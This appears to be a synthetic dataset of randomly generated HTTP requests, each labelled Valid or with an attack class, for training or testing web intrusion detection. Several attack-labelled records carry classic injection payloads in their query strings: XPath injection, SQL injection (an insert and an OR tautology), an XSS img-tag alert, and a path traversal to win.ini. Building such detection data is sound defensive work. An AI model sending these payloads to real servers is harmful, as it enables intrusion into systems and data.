UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 327x1132
Via: m1i/6.1 www.eo5ux.jpeg
Transfer-Encoding: deflate
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 479 www.cld3el.css:64 "ogBceDtbEhhj6uwZ" 
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

oxef0=uuoxtermct&Fspbodyq=30931&mtieyyx=446

End - Id: 5708
Start - Id: 12570
class: Valid
GET /xAS3ReBUWF/3replaceP7/PsUq@KDJ4rCb/nK033nsucwyNbzlaA017/p2INJbGqqo/hXAQmrA1QH@Kx.css?s1usesrinogI6=e&h4tsMt=n+emb&Wa=i%3Byg%3Fau&AoYe5nx5e9i=une&teoy=r3X2oAY%401Rj&tTeohta=2asah9yba&uhV-Dn@NZ7KL=adC5BotX&ldcwprmbuT=738094&O2EH=reo%25e&yP=15&r0asewxh9T9wnoa=6375720502&perTe0ue=76290&Lnr5d0=frekc HTTP/1.1
Host: 138.96.187.83
Connection: close
Accept: text/*, image/*;q=0.9
Accept-Charset: iso-2022-jp;q=0.5
Accept-Encoding: identity;q=0.1, deflate;q=0.7
Accept-Language: adw-pl;q=0.6, inm0-r, h-rjeal
Cache-Control: max-age=96
Client-ip: 250.98.12.167
Cookie: va=eSbing;ytorteer7enalau=(po
Cookie2: $Version="09"
Date: Thu, 23 Apr 09 04:11:16 CET
ETag: W/"yrlDJs1oar.qn35"
Expect: 100-continue
From: cOcie@dtseq.net
If-Modified-Since: Wed, 13 Feb 08 20:31:09 UTC
If-Unmodified-Since: Fri, 03 Sep 04 12:16:02 UTC
If-Match: "SvhSwG86WiMxCcKQX"
If-None-Match: "RdAYJs9t_NAoilIGrnZP"
If-Range: "Clqjz5pbnEPWmnd7w2BL"
Max-Forwards: 8799
MIME-Version: 7.5
Pragma: eclz=es6scHH9
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: Digest opaque="2jsaarr"
Range: 941-,7-5
Referer: http://www.ixiEtsp.it/sweh/gjenni/Hos2lcog/e3fu.php4
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: s1WM5l-D5i http://www.zosnbtu.st
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 366x415
Via: FTP/1.7 www.asr201tx.js
Transfer-Encoding: identity
Upgrade: rls/0.5, mx3atf/0.8, reyvel/3.5, iaelo/7.5
Warning: 299 www.sebroiht.htm "eaob" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12570
Start - Id: 35689
class: XPathInjection
GET /uh5blrr7/rv5YXtAxyTq2o/Ep5nydic4enmdbD9te/owwglavmofi/oh/aS9Nujv-Paccess_logoJ/ssqNm/2wlseoGud.exe?fosneft6ny4=mr%27%5D+++%7C+P+++%7C+%2F%2Fuser%5B++++name%2Ftext%28+++%29+%3D+%275ecps&SAG9xd=mEx6SyP&4RvWYM=nhscript&rozipmht=8&o.wPI=bio7ym&io=16120&obp=hryoWg1Zn-&tr=e++eheee9t6where%5DR&sshgs=4836481&ckr=allas&0js=adotsir6I HTTP/1.0
Host: 238.249.184.111
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: e3mCsuj-7c, dtohxam-n;q=0.4, eie-oidzeseJ, fsm-ffe;q=0.8, Enqdemr2-aniaiebd
Cache-Control: no-cache
Client-ip: 50.131.48.51
Cookie: zjh=140705
Cookie2: $Version="3"
Date: Mon, 16 Aug 04 08:06:48 UTC
ETag: W/"nj-8LRGhI.3jkOBrNm"
Expect: dOaiscoo
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Fri, 12 Mar 04 17:50:13 GMT
If-Match: "VhWHIhrBMUaG-eDIm"
If-None-Match: *
If-Range: *
Max-Forwards: 0072
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: onlo kocbiisi=iNbo9ksy
Range: -82,-22
Referer: http://www.eiiavve.be/ltnneale/jFnuy/xrhoaree/rirI.gif
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.3 (Machintosh; U; PPC 8.5; et-72; rv:0.9.5) Gecko/50104691
UA-CPU: PowerPC
UA-Disp: 165,7015,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 656x763
Via: HTTP/7.1 140.253.252.223
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35689
Start - Id: 48908
class: XPathInjection
GET /atnmtgoiqoqswV/yD9ncqp.lXO-/Tqp67echoLnxAoZEDu/S625pp3YqsXO@tmpe/SG2Edh/36QeD_.DE0xmlopt3qi/aBrneeawf5rbmtLrTk1/aY/saeoeirab/abatl1ehgmnhtCmr/kd6RFRPf_5Xqt/ek35o2mso1al.nsf?ftpfgyIv1V=hodt%27+or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%27w0x1g%27++%3D%27&sdKreomo=zZVls&r9pWX=xoi_gjD&tr7eY9roossb=f2dnianrahvuf&th0zniqe=lnservicesA7seu%25&8eciegs=erztvfoif4O&qoeaooredtaiuou=aHOqEu3Jr2&9S-orRtYQ=601&kHpto=syOaidDuOitoeniaS&asbermrtezTt=80&ct=mocpassthruicopynullrb3l+ HTTP/1.0
Host: 7.52.15.78
Connection: titoo
Accept: text/*, application/*, image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 115.108.162.213
Cookie: 002script4H3a=16843;Uz4faciratTaci=24628355;ltcheSdi=1182951559;1hs=orM;HqrlcTda0b=56
Cookie2: $Version="0"
Date: Wed, 16 Mar 05 03:27:06 UTC
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: bnte
From: nui8@hgERemx.net
If-Modified-Since: Wed, 13 Jul 05 13:44:40 UTC
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.6
Pragma: 3='jocDisn'
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: http://www.rt0tptz.de/yjnxar/rgeet/yiewe/omEeLnza.exe
TE: trailers,gzip;q=0.7
Trailer: Warning
User-Agent: rabtoo/8.8.8
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: FTP/5.6 209.101.34.97:58625, 7.8 36.246.113.99, 1.9 www.wonipier.html
Transfer-Encoding: identity
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 58510218762
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48908
Start - Id: 805
class: Valid
GET /a0psLL/nWs01be4-1Ec8BjiZfX/TiaoNa/nabthnsStcIrNreatth/llhnptisbs/eMebe7nosntAen/u1iybggUMz.Q6foPip.cfm?aldxldgmohoOeac=aa+9 HTTP/1.1
Host: 147.172.0.204
Connection: close
Accept: application/postscript;q=0.1, text/*
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 105.102.14.216
Cookie: nrnMsi=rL 91;;wg=AxnfytEliriri;5zae=93312;rudhwt=5987815
Cookie2: $Version="5"
Date: Sun, 10 Apr 05 04:09:46 UTC
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: 100-continue
From: nfa6t@yuhu.net
If-Modified-Since: Wed, 26 Apr 06 14:24:42 UTC
If-Unmodified-Since: Wed, 22 Apr 09 13:48:21 CET
If-Match: "Fmzyyq8KZklVJ3KS"
If-None-Match: "SHPLFNKU.H@ZJdekU"
If-Range: *
Max-Forwards: 8624
MIME-Version: 3.6
Pragma: ahoeog=snehwat
Proxy-Authorization: Basic Y3VlZGFlOm5aaXlG
Authorization: Digest response="D1dfcbd2CC8A2F166cfaEe68dB04e49A"
Range: 15-20,08858-
Referer: http://www.rrmntuac.biz/zsten/h8ertls/llube0cA.cfm
TE: chunked;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 0.5; vl-nt; rv:6.2.7) Gecko/22029368
UA-CPU: MIPS
UA-Disp: 764,3407,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7750x8072
Via: 3.7 www.tlmGmo.html:37394, 4wVlp/8.4 169.74.50.34
Transfer-Encoding: sssys; eaiet=Opi9tael
Upgrade: 3iofx/3.1, Trldr8/3.5
Warning: 902 87.88.171.144 "hqqbnejgret8be" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 805
Start - Id: 19269
class: Valid
GET /@OwYMservices7bY/3eeaCnr0e/ru3xNCj94/esTf/Nlnr8hamiottoeom.php4?eeePulmoo=et7efset&eehLt9aT5Sesa=cetetb54ls&bRWghSLEAPt=10&_ng6=2ohqeewecMr&Fk-MDcmd5aWT=sxd%40GJqN.7l&-Ybodyx5TLI@uE=566780&rMNxa3sheae6v=793880&i1iurrr=6eaept3uscclsestsr&5afx=6&XEhltmrbtedGi=iad%7E5ot%29mwinnt&c7yndQeIsAcn=twU2Xoj&telnetfzH=logroup+byin&imst8de=hyD_b HTTP/1.0
Host: www.b1rn79pdnt.ch:80
Connection: keep-alive
Accept: video/quicktime, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: eEz-e;q=0.0, at47i-aih;q=0.0, at69-ai9g, nieltr-owlniRu
Cache-Control: max-age=55
Client-ip: 70.40.223.207
Cookie: co=47436
Cookie2: $Version="3"
Date: Tue, 13 Jul 04 05:59:17 GMT
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: v3eiit=esirldoa
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sat, 12 Apr 08 11:57:12 GMT
If-Unmodified-Since: Tue, 06 Jan 04 10:45:26 CET
If-Match: *
If-None-Match: "I7f6UUE6lpi402UKaCUK"
If-Range: *
Max-Forwards: 73
MIME-Version: 5.9
Pragma: aqsS=myics
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: Digest uri=/Rbtt/nnjdt8yf/niOttii/qep3.php4
Range: 784688-250,21331-
Referer: http://www.tj4a.net/seno/erab4.bin
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: ecCq9@NGT http://www.aaemzleo.ch
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3141x1930
Via: 5.0 7.40.95.228, 7.3 100.242.116.63
Transfer-Encoding: Pe9Tn
Upgrade: hi5nal/8.0, hn5t/9.2, ykhito/3.3, 43fett/7.0, nnahn/6.1
Warning: 197 33.215.121.199 "ikjti0rMM2eujtmcrtse" 
X-Forwarded-For: 169.230.8.187
X-Serial-Number: 9449632282194907610
----: --------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 19269
Start - Id: 35295
class: SqlInjection
GET /uafssr6srg/ie.php3?osvprmuega=%27%3B+insert++++into++nqltU+++++values%28666%2C%27vtktk%27%2C%27bae%27%2C0xfffff%29&tnyegEe4med=nda&oydf=rr&NflhueoLtwaae=a+7etpgphptwindow.openAi%5Ce-b&e6rjVSkyiatsic5=tsaLfN4znnmnvxhr&3edue=een8&rnbi=2220988&PY2dropaccept1=eot%25enenbfotopenetc%40o%27&DgWz=5v01_x&zwAJfnull=530501 HTTP/1.0
Host: 90.162.54.14
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: ate-reb;q=0.5
Cache-Control: no-cache
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="0"
Date: Fri, 23 Apr 10 05:02:45 UTC
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Mon, 29 May 06 19:30:53 UTC
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: *
If-None-Match: "8bb2-ZSGxU8UKKENeZ"
If-Range: Fri, 01 Jul 05 16:03:33 GMT
Max-Forwards: 5604
MIME-Version: 2.6
Pragma: 3vQonb='EheOeehs'
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest response="63e449EaDA96C351aed58DC48f8d64E0"
Range: 930-456,2355-
Referer: http://yoeta.biz/otoHb.jsp
TE: trailers,trailers
Trailer: Trailer
User-Agent: ezOfJKK3WC http://www.hbda.net
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 048x605
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35295
Start - Id: 47789
class: XSS
GET /iyttsort2sScpnnuw/Cboot.iniXtXxtermjirz/eSUIGI99rRAZ@/Ib7CRHraHaMO/edI_vnKR/t7dineoi/a0Y0WoKWK0H8D/aidborro/dcOnKSFFZU.shtml?fxdEnszdgejlk=tfnodiboryr&a4lmsahFnii=zF5Xh&eat7tozPatp=menmLossl&hajyjsgic=92439542&xwinputWY0hlJR=K2tcjbodyekiocatls&egnynhrComtte5o=oftpmocha&tDenlmicrhn5ve=%3Cimg++src+++%3D++++%22++mocha%3A%5Balert+%28%272alsddt%27%29%3B%5D++++%22++++%3E&rln2n=8eiome0eedRbxhce HTTP/1.0
Host: www.NanAyl.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress;q=0.0, gzip, gzip;q=0.9
Accept-Language: *
Cache-Control: min-fresh=67
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="70"
Date: Sat, 28 Nov 09 14:06:25 UTC
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Sun, 25 Mar 07 09:49:16 GMT
If-Unmodified-Since: Sat, 09 Apr 05 24:40:00 UTC
If-Match: *
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: "FUasV5m9lzKP@jK"
Max-Forwards: 8973
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: Digest username="oaid"
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: /sa7W/vlrxkte/e6ikwnr.pdf
TE: gzip,gzip,gzip
Trailer: Accept-Language
User-Agent: lTitnofiid7ef
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7737x1025
Via: HTTP/8.4 www.yidb.css
Transfer-Encoding: compress
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47789
Start - Id: 42113
class: SqlInjection
GET /iU/Gsdhoons6tkn/4nt10hdi/rtnetelz.cfm?te0eo=eaetnoigtyregie&0ajsAr=EM&rru7aeebl2bDt=Torlsimai%29tl%28&r7D=%3Dm&nzHycytch=%27++++OR+++%27sdea%27+++++BETWEEN+++%27R%27+++++AND+%27T&ndevbfuiieI=hro%3Aeniu HTTP/1.1
Host: www.ue3l.cz:80
Connection: keep-alive
Accept: text/html;q=0.6, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jbtaonjw-e, qss-y, anUoj-sinu, tcvdpAx-qlot, reoskhe4-i
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: nrwnnlwow=neav3youlvayoo3Q
Cookie2: $Version="34"
Date: Fri, 01 Jul 05 21:43:44 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: oeeEja9t=tncldfia;etnq3hno=qcai6udr
From: jqr1h@steT4irua.uk
If-Modified-Since: Mon, 14 May 07 04:50:50 GMT
If-Unmodified-Since: Fri, 21 Mar 08 17:55:01 CET
If-Match: "PE9nmEeB@c_lsX9O"
If-None-Match: "1hcSvu90ABX8mDmFjHC"
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 153
MIME-Version: 0.9
Pragma: NslsrH='er'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM cmVvQmlubGRvaXdkbnRjc3N5anN4cmFzbTZuZWJla2RzdW9hdQ==
Range: 80-3804,023297-91,09-
Referer: http://www.acpe.gov/tnobh0ao/7ttbtIo/leeh/hsrrteY.doc
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.7 (X11; U; Unix 3.5; ll-ne; rv:7.8.5) Gecko/38987810
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 830x020
Via: 4.1 www.dhejc5e.jpeg, 0.4 202.238.59.67, HTTP/6.2 www.ilSdmbnH.html
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42113
Start - Id: 36213
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 107.230.174.52
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=176
Client-ip: 57.19.106.255
Cookie: coeiuaSo=cirjmjD9gzfw;f6=HhtaccesmT%]lib~l(tbE;Lh9P0aZJi=219391923;nasNdhnrsa=3:roI
Cookie2: $Version="32"
Date: Tue, 13 Nov 07 06:20:50 UTC
ETag: "GO2S.faufqbFl7gf_ODS"
Expect: e86z=ehdsOdp;uenhi1
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Match: *
If-None-Match: "4YteyStClQn3fyQlmtdh"
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 5112
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZGhvbjpuZHRmcno=
Range: 183-
Referer: http://www.sz1j5ne.ch/ieserb/sx4rrj.cgi
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.4 (Windows; U; Win98 7.1; ib-bM; rv:3.6.2) Gecko/15176172
UA-Disp: 399,5892,8
UA-OS: Win98
Via: 5.8 110.84.189.241, HTTP/9.2 1.12.74.59
Upgrade: sst2oo/6.7, eatt/1.0
X-Serial-Number: 003494109
----: ----------------

null

End - Id: 36213
Start - Id: 27354
class: Valid
GET /iONEJgh0UJ@csw9.jpeg?ecne2rafi=yn&gprocessing-instructionrcpA.tLWmZ=V&c0enrl=oESw2kDBiLnL&4homeqve4SOCV=%288O&wgEiLfud6tssaj=aheeln0dFeard&Tyyhst2esasyt=et&UObevalNUsystemeSUE=itthukoodmcnje&sUkUic9=dr&bdttTs=375265&r4useaeetn3xt2h=aeJQS&lw=32&elglT=91683367&biaawe9dde=passthruLtsmaure&6e8cte6rkywmsmn=wy9dyi3pt HTTP/1.0
Host: 242.67.16.124
Connection: rsoht
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 8.61.2.31
Cookie: weutsios8=594
Cookie2: $Version="5"
Date: Sun, 09 Apr 06 07:44:38 GMT
ETag: "FdUlCPUNmVCh-.a2C"
Expect: 100-continue
From: awwHpt2M@rHe8oL7N.net
If-Modified-Since: Thu, 14 Jun 07 09:19:53 CET
If-Unmodified-Since: Sat, 14 Feb 04 06:51:42 CET
If-Match: *
If-None-Match: "GHajLKYWih0rjzY"
If-Range: Tue, 11 Nov 08 23:20:21 GMT
Max-Forwards: 691
MIME-Version: 6.3
Pragma: btqttuh='ienawsN'
Proxy-Authorization: Basic b2FlYTpkaXR1aXJzcw==
Authorization: h5thi Xogces5t=rhkG
Range: 0920-857572
Referer: http://tc9ytmE.biz/qnytee/npfl/mufoa/ehare7.sh
TE: trailers,deflate;q=0.9
Trailer: Cache-Control
User-Agent: mb8h/2.9.9.5
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 904x688
Via: FTP/6.4 199.59.231.13:705, 0.9 www.tnala.gif
Transfer-Encoding: Pt70
Upgrade: aur/5.3, soc/8.9
Warning: 512 www.aenedr.jpg:10948 "eegrnttldlzoehyooi5" "Tue, 07 Dec 04 04:16:31 GMT"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 7259766093580029
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27354
Start - Id: 27166
class: Valid
GET /iag5stiNlF1/lUZZBIaaTZigh51wx/aji/VBgTQBlm8FSnph-tMy/7NN0xGxl.ZBjeH3y0O/ofOyit/ukM2OUhf2r.8ij3xUA/pLOnYdExegyFw/XdfdgenrCnbSwhoesard.gif?nonNmdrn=0glfsoeooho&ajezrrle2scoht=%29replacen&Oseiaxtl3a4a=iso0eenenN8l&fa7c6rctneg=418205&rLwn=06290&sL=733737&qe=+TNwinnt&YVsFRDs=09046208&k6rseTamueest=a%26%7C&tsc1=s8 HTTP/1.1
Host: 237.197.45.20:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 81.132.85.194
Cookie: Ko.qOuApassthruZ=41979;kfhlneedb3raa=tettmriVbodr;ZwKgoiV=dsiuwsAdno5ce9mt;ty=xpci2
Cookie2: $Version="2"
Date: Wed, 10 Dec 08 07:53:36 CET
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: Ougoui
From: rfaD@lnxcgefa16.uk
If-Modified-Since: Sun, 11 Apr 04 06:45:51 UTC
If-Unmodified-Since: Thu, 06 Sep 07 07:58:30 GMT
If-Match: "2Tv0BqVXvd0aAQpaB"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: NTLM ZXNzbjVsYWp2YXk1bmIxc29ocXdHamVpb2U5cG54ZnNoSHNzb29laGRB
Range: 026-10,-71,7-952
Referer: /qrt8dit/a1iant/uohe/ssti/eaMi3vm.fgf
TE: trailers
Trailer: Accept
User-Agent: Eeaesur/4.6.4
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1267x0247
Via: 3.7 www.QentThs.css:78, Nsee/5.4 191.104.58.144, HTTP/4.9 190.23.192.178
Transfer-Encoding: identity
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 13809536911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27166
Start - Id: 5993
class: Valid
PUT /on6pt17uA_AFwj71E_/beeiahieiec5iHsn/iframehl@ak2servicesf1fo/aesiooisnh6ue4e4Kj/wLN1JFLm_0X/brzieoliyrrrYi/genmaid7e.mspx? HTTP/1.0
Content-Length: 166
Content-Language: h7hts,eeutede,4ntet
Content-Encoding: identity
Content-Location: http://www.ardia.biz/4eik/nawsur/0anrenP/2osy33t/ioiiiiai.mspx
Content-MD5: bmVqbm1yNWh0Y2lmRG5zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Sep 05 02:18:53 GMT
Last-Modified: Wed, 09 Nov 05 05:52:44 CET
Host: www.akolJ4Daw.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 155.32.218.110
Cookie: 26fl=96079;aqutzsohcve=gssm>mhljc
Cookie2: $Version="00"
Date: Wed, 14 Apr 10 08:06:09 CET
ETag: "e85wLzIVPT7T2lTI"
Expect: 100-continue
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Mon, 24 Jan 05 03:12:26 UTC
If-Unmodified-Since: Fri, 22 Jul 05 03:47:30 UTC
If-Match: *
If-None-Match: "HvW.I.FMM6vif35CiW"
If-Range: *
Max-Forwards: 3262
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=691127d9
Authorization: Basic dGVldHdybjk6eWllbWhhb0k=
Range: 7772-71595
Referer: http://ouTuriy.it/e5Sqe0mb.asp
TE: trailers,trailers,deflate
Trailer: Warning
User-Agent: Mozilla/9.4 (compatible; MSIE 6.5; Linux i386; wbntMxk)
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3062x279
Via: 1.9 www.oiytea.jpeg, HTTP/1.7 www.GgwrM.css:3443
Transfer-Encoding: compress
Upgrade: esY3p1/5.2, uyh6n/4.1, ihlap/6.8, yksrl/0.7
Warning: 038 13.219.28.32:28266 "epiydo4rhohtsbl1ome0" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 381725681
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etcnhHq=099206613&anRnOawn=cbF-.A&aaa26aynnSmsd=em0ife\6EvNttr&here7zlid= osae&nwbnnuf=xDyMjq5GSw&manpdTohphgend=55415&xpetosegadl=asioafegnrEdi&rs=rmetat:SrdiolF

End - Id: 5993
Start - Id: 5101
class: Valid
PUT /embyteieoe/bp4AshrDbm2une/@fthbetweenBs8y.dll? HTTP/1.0
Content-Length: 96
Content-Language: ohe,c
Content-Encoding: deflate
Content-Location: http://www.djdnMtq.org/hotss.msf
Content-MD5: aGE0b25odHFvc2hOb25hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 23:59:40 CET
Last-Modified: Fri, 15 Dec 06 21:09:38 UTC
Host: 220.228.7.88
Connection: ssnee
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: dyd-rhfebaa;q=0.2, 0-e0y7Utxx
Cache-Control: no-cache
Client-ip: 204.102.238.44
Cookie: cu_xGbmvselectF5=Mrli;L1meS8sYEgWX=fhrsa;zdOoeanhfhMe=i7nfn7adnnahg;ttol=lzbicVdW8_;reao3twnmos=%uehW@/ms>%o
Cookie2: $Version="95"
Date: Sat, 26 Jun 04 22:33:52 UTC
ETag: ".gbrYssKFPv@V7NeRZ02"
Expect: 100-continue
From: dthmE@rrep.ch
If-Modified-Since: Fri, 10 Aug 07 19:55:17 GMT
If-Unmodified-Since: Thu, 25 Dec 08 06:43:36 UTC
If-Match: "aZeHFdCDN4Vk6bACLVt"
If-None-Match: "XP@X_kjxP9aUI1m"
If-Range: "Z8V6IGl0bz6vQL@SF"
Max-Forwards: 9530
MIME-Version: 8.8
Pragma: d=tte
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Digest nc=a9eB4Dbd
Range: 4666-,507125-81685,186998-
Referer: /ufLae/zrme/srwa02an.pl
TE: deflate
Trailer: Host
User-Agent: e4UkeT http://www.unsses.cz
UA-CPU: Sparc
UA-Disp: 648,7817,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 436x920
Via: crt/4.0 74.247.47.233, ePTty/1.9 92.187.144.46, FTP/7.3 82.147.220.145
Transfer-Encoding: roea
Upgrade: efd74o/3.6, MmfD/3.2, o6ce/9.4
Warning: 201 30.198.208.54 "slstaBaOnasolmatoin" "Thu, 04 Nov 04 06:08:49 GMT"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 5152392
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ot0nnSnphoss=lnCT&ki2oiri6gsrjh=nZW9O&T3il3xe=853787&tel1ebhce=p7O&I_m.EmetaU=o2assE]tElto&E

